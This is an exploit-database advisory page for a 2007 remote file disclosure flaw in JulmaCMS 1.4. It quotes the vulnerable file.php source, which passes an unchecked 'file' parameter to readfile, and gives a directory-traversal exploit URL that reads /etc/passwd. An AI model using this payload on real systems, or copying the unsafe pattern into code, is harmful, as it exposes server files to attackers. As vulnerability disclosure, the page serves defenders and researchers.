header-logo
Suggest Exploit
vendor:
JulmaCMS
by:
GolD_M
7.5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: JulmaCMS
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: NO
Related CWE:
CPE: a:julma:julmacms:1.4
Metasploit:
Other Scripts:
Platforms Tested:
2007

JulmaCMS 1.4(file.php file) Remote File Disclosure

The file.php script in JulmaCMS 1.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.

Mitigation:

Upgrade to a fixed version of JulmaCMS.
Source

Exploit-DB raw data:

# JulmaCMS 1.4(file.php file)Remote File Disclosure
# D.Script: http://julmajanne.com/downloads/julma.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code In /file.php:
###################/file.php###########################
# <?php // $Id: file.php,v 1.4 2004/04/24 18:18:22 janne Exp $
#
#    include("config.php");
#    include("lib/mime.php");
#    $file = $_GET['file'];<-------[+]
#
#    if($file) {
#        $file = $CFG->dir . $file;
#        $fname = basename($file);
#        $mime = mimetype("mime", $fname);
#
#        header("Content-Type: $mime");
#        header("Content-Lenght: ". filesize($file) ."");
#        header("Content-Disposition: inline; filename=$fname");
#        header("Content-Description: PHP Generated Data");
#        readfile($file); <-------[+]
#        unset($fname,$file,$type);
#    } else {
#        header("Location: $CFG->web");
#    }
# ?>
########################################################
# Exploit:[Path_JulmaCMS]/file.php?file=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk

# milw0rm.com [2007-04-25]